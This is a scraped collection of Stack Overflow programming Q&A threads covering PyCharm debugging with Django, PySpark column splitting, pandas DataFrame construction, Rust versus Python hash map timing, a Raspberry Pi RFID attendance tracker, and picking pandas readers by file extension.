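    # In the Qt app: timer = QTimer(); timer.timeout.connect(lambda: drain(q)); timer.start(200)
    time.sleep(3)
    drain(q)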
Q: PyCharm 2022.1.2 does not hit the debug breakpoint with Django I can't get the Python debugger to work on PyCharm 2022.1.2 with Django 4. When I set the breakpoint inside the view function and then call this view in the browser, nothing happens when the server is started in debug mode... breakpoint_selected However, the breakpoint is hit when I set it on an import. breakpoint_hit I have two configurations, one for Python and one for Django Server; neither works. config1 config2 I went through numerous JetBrains tickets from people reporting a similar problem but didn't find the solution there. I also tried creating a second run configuration, for Python instead of Django Server, but this also didn't help. A: Solved this by deleting the .idea directory from the top-level Django project dir. Not sure what the mechanics behind it were, but it worked and now breakpoints work perfectly.
PyCharm 2022.1.2 does not hit the debug breakpoint with Django
I can't get the Python debugger to work on PyCharm 2022.1.2 with Django 4. When I set the breakpoint inside the view function and then call this view in the browser, nothing happens when the server is started in debug mode... breakpoint_selected However, the breakpoint is hit when I set it on an import. breakpoint_hit I have two configurations, one for Python and one for Django Server; neither works. config1 config2 I went through numerous JetBrains tickets from people reporting a similar problem but didn't find the solution there. I also tried creating a second run configuration, for Python instead of Django Server, but this also didn't help.
[ "Solved this by deleting the .idea directory from top-level django project dir. Not sure what were the mechanics behind it, but it worked and now breakpoints work perfectly.\n" ]
[ 0 ]
[]
[]
[ "breakpoints", "debugging", "django", "pycharm", "python" ]
stackoverflow_0074582147_breakpoints_debugging_django_pycharm_python.txt
Q: How to use pyspark to convert row array into multiple columns? I have raw data like this: Column A Column B "A:1, B:2, C:3" XXX The result I want is like this: Column A A B C Column B "A:1, B:2, C:3" 1 2 3 XXX Can anyone help with pyspark code? A: df =spark.createDataFrame([ (78,'"A:1, B:2, C:3"'), ], ('id', 'ColumnA')) Replace the " with nothing. Split the resulting string with , and this will give you a list. Iterate the list elements converting them to lists by splitting with : and make all those lists of StructType. Explode the list. group by columnA and pivot. Code below df.withColumn('ColumnA', split(translate(col('ColumnA'),'"',''),',')).withColumn('ColumnA_edited', explode(transform('ColumnA', lambda x: struct(*[split(x,':')[i].alias(f'x{i+1}') for i in range(2)])))).select( 'ColumnA','ColumnA_edited.*').groupby('ColumnA').pivot('x1').agg(first('x2')).show() +-----------------+---+---+---+ | ColumnA| B| C| A| +-----------------+---+---+---+ |[A:1, B:2, C:3]| 2| 3| 1| +-----------------+---+---+---+ A: This is a solution possible thanks to the fixed amount of columns: import pyspark.sql.functions as F # create an array column from string df = df.withColumn('array', F.split('Column A', ', ')) # create a list with the new column names and the expressions to calculate them new_cols = [F.regexp_replace(df.array[i], c+':', '').alias(c) for i, c in zip([0, 1, 2], ['A', 'B', 'C'])] # select the chosen columns df.select('Column A', *new_cols, 'Column B').show() +-------------+---+---+---+--------+ | Column A| A| B| C|Column B| +-------------+---+---+---+--------+ |A:1, B:2, C:3| 1| 2| 3| XXX| +-------------+---+---+---+--------+
How to use pyspark to convert row array into multiple columns?
I have raw data like this: Column A Column B "A:1, B:2, C:3" XXX The result I want is like this: Column A A B C Column B "A:1, B:2, C:3" 1 2 3 XXX Can anyone help with pyspark code?
[ "df =spark.createDataFrame([\n(78,'\"A:1, B:2, C:3\"'),\n],\n('id', 'ColumnA'))\n\nReplace the \" with nothing. Split the resulting string with , and this will give you a list. Iterate the list elements converting them to lists by splitting with : and make all those lists of StructType. Explode the list. group by columnA and pivot. Code below\ndf.withColumn('ColumnA', split(translate(col('ColumnA'),'\"',''),',')).withColumn('ColumnA_edited', explode(transform('ColumnA', lambda x: struct(*[split(x,':')[i].alias(f'x{i+1}') for i in range(2)])))).select( 'ColumnA','ColumnA_edited.*').groupby('ColumnA').pivot('x1').agg(first('x2')).show()\n\n\n+-----------------+---+---+---+\n| ColumnA| B| C| A|\n+-----------------+---+---+---+\n|[A:1, B:2, C:3]| 2| 3| 1|\n+-----------------+---+---+---+\n\n", "This is a solution possible thanks to the fixed amount of columns:\nimport pyspark.sql.functions as F\n\n# create an array column from string\ndf = df.withColumn('array', F.split('Column A', ', '))\n\n# create a list with the new column names and the expressions to calculate them\nnew_cols = [F.regexp_replace(df.array[i], c+':', '').alias(c) for i, c in zip([0, 1, 2], ['A', 'B', 'C'])]\n\n# select the chosen columns\ndf.select('Column A', *new_cols, 'Column B').show()\n\n+-------------+---+---+---+--------+\n| Column A| A| B| C|Column B|\n+-------------+---+---+---+--------+\n|A:1, B:2, C:3| 1| 2| 3| XXX|\n+-------------+---+---+---+--------+\n\n" ]
[ 0, 0 ]
[]
[]
[ "apache_spark_sql", "dataframe", "pyspark", "python" ]
stackoverflow_0074543049_apache_spark_sql_dataframe_pyspark_python.txt
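A third option worth sketching: Spark SQL's str_to_map (available since Spark 3.0) parses the 'A:1, B:2, C:3' string into a map in one expression, avoiding the explode/pivot round trip. Assuming the two-column input from the question:

import pyspark.sql.functions as F

# Strip the quotes, then parse pairs separated by ", " with ":" between key and value.
df = df.withColumn(
    'm', F.expr("str_to_map(translate(`Column A`, '\"', ''), ', ', ':')"))

df.select('Column A',
          F.col('m')['A'].alias('A'),
          F.col('m')['B'].alias('B'),
          F.col('m')['C'].alias('C'),
          'Column B').show()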
Q: How to create a dataframe from a list of lists? I need to create a dataframe from a list which contains the data for 10 stocks, one list per stock, but in the required format all items should be listed in one column instead of one column per element. The required format should look like this image below. I tried this (the entire code): import openpyxl import pandas as pd xl = openpyxl.load_workbook("Stock_sample.xlsx") sheet1 = xl["Close Price"] all_cols = sheet1.iter_cols(min_col=2, max_col=10, values_only = True) all_cols_list = [] for cols in all_cols: all_cols_list.append(cols) df = pd.DataFrame (all_cols_list) print (df) all_cols_list is a list of lists, and creating a df from that list returned a dataframe like the one below. So I don't know how to do this; please suggest a way to achieve the required format A: Each inner list is kept as a separate sequence, so the values end up spread across multiple columns instead of stacked in one. If you flatten these lists into a single list, you can get the output you want. You can use: df=pd.DataFrame([i for sublist in all_cols_list for i in sublist])
How to create a dataframe from a list of lists?
I need to create a dataframe from a list which contains the data for 10 stocks, one list per stock, but in the required format all items should be listed in one column instead of one column per element. The required format should look like this image below. I tried this (the entire code): import openpyxl import pandas as pd xl = openpyxl.load_workbook("Stock_sample.xlsx") sheet1 = xl["Close Price"] all_cols = sheet1.iter_cols(min_col=2, max_col=10, values_only = True) all_cols_list = [] for cols in all_cols: all_cols_list.append(cols) df = pd.DataFrame (all_cols_list) print (df) all_cols_list is a list of lists, and creating a df from that list returned a dataframe like the one below. So I don't know how to do this; please suggest a way to achieve the required format
[ "Each list inside the list will be a new column. If you convert these lists into a single list, you can get the output you want. You can use:\ndf=pd.DataFrame([i for sublist in all_cols_list for i in sublist])\n\n" ]
[ 1 ]
[]
[]
[ "openpyxl", "pandas", "python", "python_3.x" ]
stackoverflow_0074592291_openpyxl_pandas_python_python_3.x.txt
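Two equivalent flattening idioms for the accepted approach, in case the nested comprehension reads awkwardly: itertools.chain does the same thing, and naming the column keeps the result self-describing. A minimal sketch with dummy data in place of the spreadsheet columns:

from itertools import chain
import pandas as pd

all_cols_list = [(1.0, 2.0, 3.0), (4.0, 5.0, 6.0)]  # stand-in for iter_cols output

df = pd.DataFrame(list(chain.from_iterable(all_cols_list)), columns=['close_price'])
print(df)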
Q: Why is Rust's HashMap slower than Python's dict? I wrote scripts performing the same computations with dict and hashmap in Rust and in Python. Somehow the Python version is more than 10x faster. How does that happen? Rust script: use std::collections::HashMap; use std::time::Instant; fn main() { let now = Instant::now(); let mut h = HashMap::new(); for i in 0..1000000 { h.insert(i, i); } let elapsed = now.elapsed(); println!("Elapsed: {:.2?}", elapsed); } Output: Elapsed: 828.73ms Python script: import time start = time.time() d = dict() for i in range(1000000): d[i] = i print(f"Elapsed: {(time.time() - start) * 1000:.2f}ms") Output: Elapsed: 64.93ms The same holds for string keys. I searched for different workarounds using different hashers for HashMap, but none of them gives more than a 10x speed-up A: Rust by default doesn't have optimizations enabled, because it's annoying for debugging. That makes it, in debug mode, slower than Python. Enabling optimizations should fix that problem. This behaviour is not specific to Rust, it's the default for most compilers (like gcc/g++ or clang for C/C++, both require the -O3 flag for maximum performance). You can enable optimizations in Rust by adding the --release flag to the respective cargo commands, like: cargo run --release Python doesn't distinguish between with or without optimizations, because Python is an interpreted language and doesn't have an (explicit) compilation step. This is the behavior of your code on my machine: Python: ~180ms Rust: ~1750 ms Rust (with --release): ~160ms Python's dict implementation is most likely written in C and heavily optimized, so it should be similar in performance to Rust's HashMap, which is exactly what I see on my machine.
Why is Rust's HashMap slower than Python's dict?
I wrote scripts performing the same computations with dict and hashmap in Rust and in Python. Somehow the Python version is more than 10x faster. How does that happen? Rust script: use std::collections::HashMap; use std::time::Instant; fn main() { let now = Instant::now(); let mut h = HashMap::new(); for i in 0..1000000 { h.insert(i, i); } let elapsed = now.elapsed(); println!("Elapsed: {:.2?}", elapsed); } Output: Elapsed: 828.73ms Python script: import time start = time.time() d = dict() for i in range(1000000): d[i] = i print(f"Elapsed: {(time.time() - start) * 1000:.2f}ms") Output: Elapsed: 64.93ms The same holds for string keys. I searched for different workarounds using different hashers for HashMap, but none of them gives more than a 10x speed-up
[ "Rust by default doesn't have optimizations enabled, because it's annoying for debugging. That makes it, in debug mode, slower than Python. Enabling optimizations should fix that problem.\nThis behaviour is not specific to Rust, it's the default for most compilers (like gcc/g++ or clang for C/C++, both require the -O3 flag for maximum performance).\nYou can enable optimizations in Rust by adding the --release flag to the respective cargo commands, like:\ncargo run --release\n\nPython doesn't distinguish between with or without optimizations, because Python is an interpreted language and doesn't have an (explicit) compilation step.\nThis is the behavior of your code on my machine:\n\nPython: ~180ms\nRust: ~1750 ms\nRust (with --release): ~160ms\n\nPython's dict implementation is most likely written in C and heavily optimized, so it should be similar in performance to Rust's HashMap, which is exactly what I see on my machine.\n" ]
[ 0 ]
[]
[]
[ "hashmap", "python", "rust" ]
stackoverflow_0074592062_hashmap_python_rust.txt
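A minor methodological note on the Python side of the benchmark: time.time has limited resolution and can jump with system clock adjustments, whereas time.perf_counter is the intended tool for measuring intervals. A sketch of the same measurement:

import time

start = time.perf_counter()
d = {}
for i in range(1_000_000):
    d[i] = i
elapsed_ms = (time.perf_counter() - start) * 1000
print(f"Elapsed: {elapsed_ms:.2f}ms")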
Q: Simple system to track hours worked I am a total beginner and I think I underestimated my little project. I am trying to implement a simple attendance system that will give me the hours worked per day and later per month. I am using a Raspberry Pi 3 B+ with an RC522 RFID reader and a 16x2 LCD display. The data is stored in a database using MariaDB. The idea is to use it for student workers in a restaurant to clock in their hours. The employees still write down their hours, but if it works it could replace the paperwork; we will see. I know that there will be some concerns about legality, but that's up to the lawyers once I am done. However, my issue is that right now I am unable to clock in and clock out multiple users independently. It does work for one user. If I clock in user 1, the system waits for the next clock-out, no matter which user it comes from. So user 1 clocks in; when user 2 then wants to clock in, he is registered as clocking out instead, and only then is the database entry written. I think it somehow would need to update the entries instantly. I think you can get the idea from the picture phpMyAdminScreenshot I think I need to get more info from the database and compare it to what I have. But I have hit a wall now and I am unable to find a solution for my problem. The code I have right now: #!/usr/bin/env python import time import datetime import RPi.GPIO as GPIO from mfrc522 import SimpleMFRC522 import mysql.connector import drivers db = mysql.connector.connect( host="localhost", user="xxx", passwd="xxx", database="attendancesystem" ) cursor = db.cursor() reader = SimpleMFRC522() display = drivers.Lcd() sign_in = 0 sign_out= 1 try: while True: display.lcd_clear() display.lcd_display_string("Transponder", 1) display.lcd_display_string("platzieren", 2) id, text = reader.read() ts = time.time() timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') cursor.execute("Select id, name FROM users WHERE rfid_uid="+str(id)) result = cursor.fetchone() display.lcd_clear() #if cursor.rowcount >= 1: #display.lcd_display_string("Willkommen " + result[1], 2) #cursor.execute("INSERT INTO attendance (user_id) VALUES (%s)", (result[0],) ) if sign_in == 0: sign_in = (sign_in +1) % 2 sign_out = (sign_out +1) % 2 cursor.execute(f"INSERT INTO attendance (user_id, clock_in, signed_in) VALUES (%s, %s, %s)", (result[0], timestamp, sign_in) ) display.lcd_display_string(f"Angemeldet " + result[1], 1) elif sign_in == 1: sign_out = (sign_out +1) % 2 sign_in = (sign_in +1) % 2 cursor.execute(f"INSERT INTO attendance (user_id, clock_out, signed_in) VALUES (%s, %s, %s)", (result[0], timestamp, sign_in) ) display.lcd_display_string (f"Abgemeldet " + result[1], 1) db.commit() else: display.lcd_display_string("Existiert nicht.", 1) time.sleep(2) finally: GPIO.cleanup() My idea was to add one more database column called signed_in and have it as either 0 or 1. The signed_in status does update how I want it to, but I don't know how to continue from here. And I am unable to update the table the way I want. My idea was to get the user_id and check the last signed_in status for this id: if it is 1, the timestamp updates the clock_out column and signed_in is set to 0. If it is 0 and clock_out is not NULL, it starts a new row with the clock_in timestamp and switches signed_in to 1. I didn't have any luck with updating any database values, so I reverted back to INSERT. A: I would expect the database would only store events. These events would be from when they touched the RFID. The card would have an ID/employee number.
Processing the database information would allow the calculation of who is on shift and the length of shifts worked etc. If there was an odd number of entries for an employee then you could assume they are on shift. Even number of entries would mean they have completed the shift. I don't have your hardware or database so I've created random RFID read events and used sqlite3. import datetime import random import sqlite3 import time class SimpleMFRC522: @staticmethod def read(): while random.randint(0, 30) != 10: # Create some delay/blocking time.sleep(1) employee_id = random.randint(0, 5) return employee_id, f'employee_{employee_id}' class MyDatabase: def __init__(self): self.db = sqlite3.connect('/tmp/my-test.db') with self.db: self.db.execute(""" CREATE TABLE IF NOT EXISTS workers ( id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, empl_no INTEGER, name TEXT, tap_event timestamp); """) self.db.commit() def insert_event(self, empl_no, name, timestamp): sqlite_insert_with_param = """INSERT INTO 'workers' ('empl_no', 'name', 'tap_event') VALUES (?, ?, ?);""" self.db.cursor() self.db.execute(sqlite_insert_with_param, (empl_no, name, timestamp)) self.db.commit() def worker_in(self, empl_no): sql_cmd = f"SELECT COUNT(*) FROM workers WHERE empl_no = {empl_no};" cursor = self.db.execute(sql_cmd) event_count, = cursor.fetchone() return event_count % 2 == 1 and event_count > 0 def last_shift(self, empl_no): sql_cmd = f"""SELECT tap_event FROM (SELECT * FROM workers WHERE empl_no = {empl_no} ORDER BY tap_event DESC LIMiT 2) ORDER BY tap_event ASC ;""" cursor = self.db.execute(sql_cmd) tap_in, tap_out = cursor.fetchall() start = datetime.datetime.fromtimestamp(tap_in[0]) end = datetime.datetime.fromtimestamp(tap_out[0]) return end - start def main(): db = MyDatabase() reader = SimpleMFRC522() while True: empl_no, name = reader.read() print(f"adding tap event for {name}") db.insert_event(empl_no, name, datetime.datetime.timestamp(datetime.datetime.now())) if db.worker_in(empl_no): print(f"\t{name} has started their shift") else: time_worked = db.last_shift(empl_no) print(f"\t{name} has left the building after {time_worked}") if __name__ == '__main__': main() This gave me a transcript as follows adding tap event for employee_5 employee_5 has started their shift adding tap event for employee_0 employee_0 has left the building after 0:02:10.154697 adding tap event for employee_3 employee_3 has left the building after 0:07:02.465903 adding tap event for employee_3 employee_3 has started their shift adding tap event for employee_2 employee_2 has left the building after 0:06:27.403874 adding tap event for employee_2 employee_2 has started their shift
Simple system to track hours worked
I am a total beginner and I think I underestimated my little project. I am trying to implement a simple attendance system that will give me the hours worked per day and later per month. I am using a Raspberry Pi 3 B+ with an RC522 RFID reader and a 16x2 LCD display. The data is stored in a database using MariaDB. The idea is to use it for student workers in a restaurant to clock in their hours. The employees still write down their hours, but if it works it could replace the paperwork; we will see. I know that there will be some concerns about legality, but that's up to the lawyers once I am done. However, my issue is that right now I am unable to clock in and clock out multiple users independently. It does work for one user. If I clock in user 1, the system waits for the next clock-out, no matter which user it comes from. So user 1 clocks in; when user 2 then wants to clock in, he is registered as clocking out instead, and only then is the database entry written. I think it somehow would need to update the entries instantly. I think you can get the idea from the picture phpMyAdminScreenshot I think I need to get more info from the database and compare it to what I have. But I have hit a wall now and I am unable to find a solution for my problem. The code I have right now: #!/usr/bin/env python import time import datetime import RPi.GPIO as GPIO from mfrc522 import SimpleMFRC522 import mysql.connector import drivers db = mysql.connector.connect( host="localhost", user="xxx", passwd="xxx", database="attendancesystem" ) cursor = db.cursor() reader = SimpleMFRC522() display = drivers.Lcd() sign_in = 0 sign_out= 1 try: while True: display.lcd_clear() display.lcd_display_string("Transponder", 1) display.lcd_display_string("platzieren", 2) id, text = reader.read() ts = time.time() timestamp = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') cursor.execute("Select id, name FROM users WHERE rfid_uid="+str(id)) result = cursor.fetchone() display.lcd_clear() #if cursor.rowcount >= 1: #display.lcd_display_string("Willkommen " + result[1], 2) #cursor.execute("INSERT INTO attendance (user_id) VALUES (%s)", (result[0],) ) if sign_in == 0: sign_in = (sign_in +1) % 2 sign_out = (sign_out +1) % 2 cursor.execute(f"INSERT INTO attendance (user_id, clock_in, signed_in) VALUES (%s, %s, %s)", (result[0], timestamp, sign_in) ) display.lcd_display_string(f"Angemeldet " + result[1], 1) elif sign_in == 1: sign_out = (sign_out +1) % 2 sign_in = (sign_in +1) % 2 cursor.execute(f"INSERT INTO attendance (user_id, clock_out, signed_in) VALUES (%s, %s, %s)", (result[0], timestamp, sign_in) ) display.lcd_display_string (f"Abgemeldet " + result[1], 1) db.commit() else: display.lcd_display_string("Existiert nicht.", 1) time.sleep(2) finally: GPIO.cleanup() My idea was to add one more database column called signed_in and have it as either 0 or 1. The signed_in status does update how I want it to, but I don't know how to continue from here. And I am unable to update the table the way I want. My idea was to get the user_id and check the last signed_in status for this id: if it is 1, the timestamp updates the clock_out column and signed_in is set to 0. If it is 0 and clock_out is not NULL, it starts a new row with the clock_in timestamp and switches signed_in to 1. I didn't have any luck with updating any database values, so I reverted back to INSERT.
[ "I would expect the database would only store events. These events would be from when they touched the RFID. The card would have an ID/employee number.\nProcessing the database information would allow the calculation of who is on shift and the length of shifts worked etc.\n\nIf there was an odd number of entries for an employee then you could assume they are on shift. Even number of entries would mean they have completed the shift.\nI don't have your hardware or database so I've created random RFID read events and used sqlite3.\nimport datetime\nimport random\nimport sqlite3\nimport time\n\n\nclass SimpleMFRC522:\n @staticmethod\n def read():\n while random.randint(0, 30) != 10: # Create some delay/blocking\n time.sleep(1)\n employee_id = random.randint(0, 5)\n return employee_id, f'employee_{employee_id}'\n\n\nclass MyDatabase:\n def __init__(self):\n self.db = sqlite3.connect('/tmp/my-test.db')\n with self.db:\n self.db.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS workers (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n empl_no INTEGER,\n name TEXT,\n tap_event timestamp);\n \"\"\")\n self.db.commit()\n\n def insert_event(self, empl_no, name, timestamp):\n sqlite_insert_with_param = \"\"\"INSERT INTO 'workers'\n ('empl_no', 'name', 'tap_event') \n VALUES (?, ?, ?);\"\"\"\n self.db.cursor()\n self.db.execute(sqlite_insert_with_param, (empl_no, name, timestamp))\n self.db.commit()\n\n def worker_in(self, empl_no):\n sql_cmd = f\"SELECT COUNT(*) FROM workers WHERE empl_no = {empl_no};\"\n cursor = self.db.execute(sql_cmd)\n event_count, = cursor.fetchone()\n return event_count % 2 == 1 and event_count > 0\n\n def last_shift(self, empl_no):\n sql_cmd = f\"\"\"SELECT tap_event FROM \n (SELECT * FROM workers WHERE empl_no = {empl_no} ORDER BY tap_event DESC LIMiT 2) \n ORDER BY tap_event ASC ;\"\"\"\n cursor = self.db.execute(sql_cmd)\n tap_in, tap_out = cursor.fetchall()\n start = datetime.datetime.fromtimestamp(tap_in[0])\n end = datetime.datetime.fromtimestamp(tap_out[0])\n return end - start\n\n\ndef main():\n db = MyDatabase()\n reader = SimpleMFRC522()\n while True:\n empl_no, name = reader.read()\n print(f\"adding tap event for {name}\")\n db.insert_event(empl_no, name, datetime.datetime.timestamp(datetime.datetime.now()))\n if db.worker_in(empl_no):\n print(f\"\\t{name} has started their shift\")\n else:\n time_worked = db.last_shift(empl_no)\n print(f\"\\t{name} has left the building after {time_worked}\")\n\n\nif __name__ == '__main__':\n main()\n\nThis gave me a transcript as follows\nadding tap event for employee_5\n employee_5 has started their shift\nadding tap event for employee_0\n employee_0 has left the building after 0:02:10.154697\nadding tap event for employee_3\n employee_3 has left the building after 0:07:02.465903\nadding tap event for employee_3\n employee_3 has started their shift\nadding tap event for employee_2\n employee_2 has left the building after 0:06:27.403874\nadding tap event for employee_2\n employee_2 has started their shift\n\n" ]
[ 0 ]
[]
[]
[ "mariadb", "python", "raspberry_pi", "raspberry_pi3", "rfid" ]
stackoverflow_0074591121_mariadb_python_raspberry_pi_raspberry_pi3_rfid.txt
Q: Python Dataframe find the file type, choose the correct pd.read_ and merge them I have a list of files to be imported into a data frame; code:
# list contains the dataset name followed by the column name to match all the datasets; this list keeps changing and even the file formats. These dataset file names are provided by the user, and they are unique.
# First: find the file extension format and select the appropriate pd.read_ to import
# second: merge the dataframes on the index
# in the below list,
file_list = ['dataset1.csv','datetime','dataset2.xlsx','timestamp']

df = pd.DataFrame()
for i in range(0, len(file_list), 2):
    # find the file type first
    # presently, I don't know how to find the file type; so
    file_type = 'csv'

    # second: merge the dataframe into the existing dataframe on the index
    tdf = pd.DataFrame()
    if file_type == 'csv':
        tdf = pd.read_csv('%s'%(file_list[i]))
    if file_type == 'xlsx':
        tdf = pd.read_excel('%s'%(file_list[i]))
    tdf.set_index('%s'%(file_list[i+1]), inplace=True)

    # Merge dataframe with the existing dataframe
    df = df.merge(tdf, right_index=True, left_index=True)

I reached this far. Is there any module available to find the file type directly? I found magic, but it has issues while importing it. Also, can you suggest a better approach to merge the files?
Update: Working solution
Inspired by the @ljdyer answer below, I came up with the following, and it works perfectly:
def find_file_type_import(file_name):
    # Total file extensions possible for importing data
    file_type = {'csv':'pd.read_csv(file_name)',
                 'xlsx':'pd.read_excel(file_name)',
                 'txt':'pd.read_csv(file_name)',
                 'parquet':'pd.read_parquet(file_name)',
                 'json':'pd.read_json(file_name)'
                 }
    df = [eval(val) for key,val in file_type.items() if file_name.endswith(key)][0]
    return df

df = find_file_type_import(file_list[0])

This is working perfectly. Thank you for your valuable suggestions. Also, is the use of eval here a good idea or not?
A: The file type is just the three or four letters at the end of the file name, so the simplest way to do this would just be:
if file_list[i].endswith('csv'):

etc.
Other common options would be os.path.splitext or the suffix attribute of a Path object from the built-in os and pathlib libraries respectively.
The way you are merging looks fine, but I'm not sure why you are using percent notation for the parameters to read_, set_index, etc. The elements of your list are just strings anyway, so for example
tdf = pd.read_csv('%s'%(file_list[i]))

could just be:
tdf = pd.read_csv(file_list[i])

(Answer to follow-up question)
Really nice idea to use a dict! It is generally considered good practice to avoid eval wherever possible, so here's an alternative option with the pandas functions themselves as dictionary values. I also suggest a prettier syntax for your list comprehension with exactly one element based on this answer and some clearer variable names:
def find_file_type_import(file_name):
    # Total file extensions possible for importing data
    read_functions = {'csv': pd.read_csv,
                      'xlsx': pd.read_excel,
                      'txt': pd.read_csv,
                      'parquet': pd.read_parquet,
                      'json': pd.read_json}
    [df] = [read(file_name) for file_ext, read in read_functions.items()
            if file_name.endswith(file_ext)]
    return df

A: You can use glob (or even just os) to retrieve the list of files from a part of their name. Since you guarantee the uniqueness of the file irrespective of the extension, it will only be one (otherwise just put a loop that iterates over the retrieved elements). 
Once you have the full file name (which clearly has the extension), just do a split() taking the last element obtained that corresponds to the file extension. Then, you can read the dataframe with the appropriate function. Here is an example of code: from glob import glob file_list = [ 'dataset0', # corresponds to dataset0.csv 'dataset1', # corresponds to dataset1.xlsx 'dataset2.a' ] for file in file_list: files_with_curr_name = glob(f'*{file}*') if len(files_with_curr_name) > 0: full_file_name = files_with_curr_name[0] # take the first element, the uniqueness of the file name being guaranteed # extract the file extension (string after the dot, so the last element of split) file_type = full_file_name.split(".")[-1] if file_type == 'csv': print(f'Read {full_file_name} as csv') # df = pd.read_csv(full_file_name) elif file_type == 'xlsx': print(f'Read {full_file_name} as xlsx') else: print(f"Don't read {full_file_name}") Output will be: Read dataset0.csv as csv Read dataset1.xlsx as xlsx Don't read dataset2.a A: Using pathlib and a switch dict to call functions. from pathlib import Path import pandas as pd def main(files: list) -> None: caller = { ".csv": read_csv, ".xlsx": read_excel, ".pkl": read_pickle } for file in get_path(files): print(caller.get(file.suffix)(file)) def get_path(files: list) -> list: file_path = [x for x in Path.home().rglob("*") if x.is_file()] return [x for x in file_path if x.name in files] def read_csv(file: Path) -> pd.DataFrame: return pd.read_csv(file) def read_excel(file: Path) -> pd.DataFrame: return pd.read_excel(file) def read_pickle(file: Path) -> pd.DataFrame: return pd.read_pickle(file) if __name__ == "__main__": files_to_read = ["spam.csv", "ham.pkl", "eggs.xlsx"] main(files_to_read)
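The suffix dispatch and the merge-on-index step from the question can also be combined into one helper. This is only a sketch: the reader mapping and the (file, index column) pairs below are assumed to match the question's setup, and the files must exist on disk.
from functools import reduce
from pathlib import Path

import pandas as pd

READERS = {'.csv': pd.read_csv, '.txt': pd.read_csv,
           '.xlsx': pd.read_excel, '.parquet': pd.read_parquet,
           '.json': pd.read_json}


def load_and_merge(pairs):
    # pairs: [(file_name, index_column), ...]
    frames = [READERS[Path(name).suffix.lower()](name).set_index(col)
              for name, col in pairs]
    return reduce(lambda left, right: left.merge(
        right, left_index=True, right_index=True), frames)


df = load_and_merge([('dataset1.csv', 'datetime'), ('dataset2.xlsx', 'timestamp')])

Looking up the suffix in a dict raises a KeyError for unsupported extensions, which is usually preferable to silently skipping a file.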
Python Dataframe find the file type, choose the correct pd.read_ and merge them
I have a list of files to be imported into the data frame cdoe: # list contains the dataset name followed by the column name to match all the datasets; this list keeps changing and even the file formats. These dataset file names are provided by the user, and they are unique. # First: find the file extension format and select appropriate pd.read_ to import # second: merge the dataframes on the index # in the below list, file_list = ['dataset1.csv','datetime','dataset2.xlsx','timestamp'] df = pd.DataFrame() for i in range(0:2:len(file_list)): # find the file type first # presently, I don't know how to find the file type; so file_type = 'csv' # second: merge the dataframe into the existing dataframe on the index tdf = pd.DataFrame() if file_type == 'csv': tdf = pd.read_csv('%s'%(file_list[i]))) if file_type == 'xlsx': tdf = pd.read_excel('%s'%(file_list[i]))) tdf.set_index('%s'%(file_list[i+1]),inplace=True) # Merge dataframe with the existing dataframe df = df.merge(tdf,right_index=True,left_index=True) I reached this far. Is any direct module available to find the file type? I found magic but it has issues while importing it. Also, suggest a better approach to merge the files? Update: Working solution Inspired from the @ljdyer answer below, I came with the following and this is working perfectly: def find_file_type_import(file_name): # Total file extensions possible for importing data file_type = {'csv':'pd.read_csv(file_name)', 'xlsx':'pd.read_excel(file_name)', 'txt':'pd.read_csv(file_name)', 'parquet':'pd.read_parquet(file_name)', 'json':'pd.read_json(file_name)' } df = [eval(val) for key,val in file_type.items() if file_name .endswith(key)][0] return df df = find_file_type_import(file_list [0]) This is working perfectly. Thank you for your valuable suggestions. ALso, correct me with the use of eval is good one or not?
[ "The file type is just the three or four letters at the end of the file name, so the simplest way to do this would just be:\nif file_list[i].endswith('csv'):\n\netc.\nOther commons options would be os.path.splitext or the suffix attribute of a Path object from the built-in os and pathlib libraries respectively.\nThe way you are merging looks fine, but I'm not sure why you are using percent notation for the parameters to read_, set_index, etc. The elements of your list are just strings anyway, so for example\ntdf = pd.read_csv('%s'%(file_list[i])))\n\ncould just be:\ntdf = pd.read_csv(file_list[i])\n\n\n(Answer to follow-up question)\nReally nice idea to use a dict! It is generally considered good practice to avoid eval wherever possible, so here's an alternative option with the pandas functions themselves as dictionary values. I also suggest a prettier syntax for your list comprehension with exactly one element based on this answer and some clearer variable names:\ndef find_file_type_import(file_name):\n # Total file extensions possible for importing data\n read_functions = {'csv': pd.read_csv,\n 'xlsx': pd.read_excel,\n 'txt': pd.read_csv,\n 'parquet': pd.read_parquet,\n 'json': pd.read_json}\n [df] = [read(file_name) for file_ext, read in read_functions.items()\n if file_name.endswith(file_ext)]\n return df\n\n", "You can use glob (or even just os) to retrieve the list of files from a part of their name. Since you guarantee the uniqueness of the file irrespective of the extension, it will only be one (otherwise just put a loop that iterates over the retrieved elements).\nOnce you have the full file name (which clearly has the extension), just do a split() taking the last element obtained that corresponds to the file extension.\nThen, you can read the dataframe with the appropriate function.\nHere is an example of code:\nfrom glob import glob\n\nfile_list = [\n 'dataset0', # corresponds to dataset0.csv\n 'dataset1', # corresponds to dataset1.xlsx\n 'dataset2.a'\n]\n\nfor file in file_list:\n files_with_curr_name = glob(f'*{file}*')\n\n if len(files_with_curr_name) > 0:\n full_file_name = files_with_curr_name[0] # take the first element, the uniqueness of the file name being guaranteed\n\n # extract the file extension (string after the dot, so the last element of split)\n file_type = full_file_name.split(\".\")[-1]\n\n if file_type == 'csv':\n print(f'Read {full_file_name} as csv')\n # df = pd.read_csv(full_file_name)\n elif file_type == 'xlsx':\n print(f'Read {full_file_name} as xlsx')\n else:\n print(f\"Don't read {full_file_name}\")\n\nOutput will be:\nRead dataset0.csv as csv\nRead dataset1.xlsx as xlsx\nDon't read dataset2.a\n\n", "Using pathlib and a switch dict to call functions.\nfrom pathlib import Path\n\nimport pandas as pd\n\n\ndef main(files: list) -> None:\n caller = {\n \".csv\": read_csv,\n \".xlsx\": read_excel,\n \".pkl\": read_pickle\n }\n\n for file in get_path(files):\n print(caller.get(file.suffix)(file))\n\n\ndef get_path(files: list) -> list:\n file_path = [x for x in Path.home().rglob(\"*\") if x.is_file()]\n\n return [x for x in file_path if x.name in files]\n\n\ndef read_csv(file: Path) -> pd.DataFrame:\n return pd.read_csv(file)\n\n\ndef read_excel(file: Path) -> pd.DataFrame:\n return pd.read_excel(file)\n\n\ndef read_pickle(file: Path) -> pd.DataFrame:\n return pd.read_pickle(file)\n\n\nif __name__ == \"__main__\":\n files_to_read = [\"spam.csv\", \"ham.pkl\", \"eggs.xlsx\"]\n main(files_to_read)\n\n" ]
